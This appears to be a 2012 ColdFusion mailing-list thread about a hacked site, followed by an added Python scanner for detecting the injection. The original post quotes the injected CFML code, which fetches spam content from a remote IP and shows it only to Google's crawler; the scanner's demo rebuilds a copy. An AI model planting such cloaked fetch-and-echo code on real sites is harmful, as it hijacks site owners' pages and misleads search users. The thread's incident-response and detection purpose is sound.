Firstly, you should try to determine when the hack was done. Check the last modified date of the file in question (unless you have already edited it since). Then ask your host to check the FTP logs for that date and see if anyone accessed that file on that date; this will rule out FTP as the cause. If it was FTP, then they can tell you the login details used and from what IP address. This will tell you if it was one of your developers or someone else.
Then you can check your web logs for that date and look for any injections that may have occurred, which will show which file was the one used for the hack. To test your host's server security, upload a file browser script in all the supported languages (php, asp, .net, cf, perl etc) and try to read/write files outside your webspace. You should be able to download free scripts for this.

On Tue, Nov 13, 2012 at 8:57 PM, Les Mizzell <[email protected]> wrote:
>
> Recently a site of ours got hacked - basically, a Google search of the site
> was returning viagra info!
> What we got was a small script added to the end of a functions.cfm file:
>
> <cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( "google", REQUEST.UserAgent )) >
> <cfhttp method="get" url="http://168.16.228.250/fms/"><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>
>
> I'm not the server admin for this site, so they're sorta pointing the
> finger at us developers, and we're pointing fingers back at them about
> lax server security. We've got a boatload of stuff on this site to
> prevent SQL injection, including Justin D. Scott's application script,
> carefully checking anything that goes into the database, client and server
> side form validation, blah, blah, blah...
>
> Anybody seen the above, and if so, thoughts? Anybody manage to determine
> how the exploit happened to start with?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353151
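Added example, not part of the original thread: a small Python scanner for the kind of injection quoted above (a `cfhttp` fetch of a remote page whose body is echoed back, optionally only when the user agent matches a crawler). It reports each hit with its last-modified time, which is the date to take to the FTP and web logs. The regex heuristics, function names and the sample webroot (with the documentation address 192.0.2.10) are constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Heuristics modelled on the injected snippet quoted in this thread (assumptions).
UA_CHECK = re.compile(r"cgi\.http_user_agent", re.I)
REMOTE_FETCH = re.compile(r"<cfhttp\b[^>]*\burl\s*=\s*[\"']https?://([^/\"'\s]+)", re.I)
ECHO_BODY = re.compile(r"#\s*cfhttp\.filecontent\s*#", re.I)
CF_EXTENSIONS = (".cfm", ".cfc", ".cfml")

def scan_file(path):
    """Return a finding if the file fetches a remote page and echoes it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    fetch = REMOTE_FETCH.search(text)
    if not (fetch and ECHO_BODY.search(text)):
        return None
    mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
    return {"file": os.path.basename(path),
            "host": fetch.group(1),
            "ua_gated": bool(UA_CHECK.search(text)),  # shown to crawlers only
            "modified_utc": mtime.strftime("%Y-%m-%d %H:%M:%S")}

def scan_tree(root):
    """Scan every CFML file under root; oldest modification first."""
    paths = [os.path.join(d, n) for d, _, names in os.walk(root)
             for n in names if n.lower().endswith(CF_EXTENSIONS)]
    hits = [h for h in map(scan_file, paths) if h]
    return sorted(hits, key=lambda h: h["modified_utc"])

def demo():
    """Build a constructed two-file webroot and scan it."""
    clean = '<cfhttp url="http://api.example.com/rates" result="r">\n'
    bad = ('<cfset ua = LCase(CGI.http_user_agent)><cfif Find("google", ua)>\n'
           '<cfhttp method="get" url="http://192.0.2.10/fms/">\n'
           '<cfoutput>#cfhttp.filecontent#</cfoutput></cfif>\n')
    when = datetime(2012, 11, 10, 3, 15, tzinfo=timezone.utc).timestamp()
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("rates.cfm", clean), ("functions.cfm", bad)):
            path = os.path.join(root, name)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.utime(path, (when, when))  # constructed modification time
        return scan_tree(root)

if __name__ == "__main__":
    for hit in demo():
        print(hit)
```

On a real site, call `scan_tree()` on a copy of the webroot; a legitimate template that echoes a `cfhttp` response will also be listed, so treat hits as leads to review, not verdicts.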

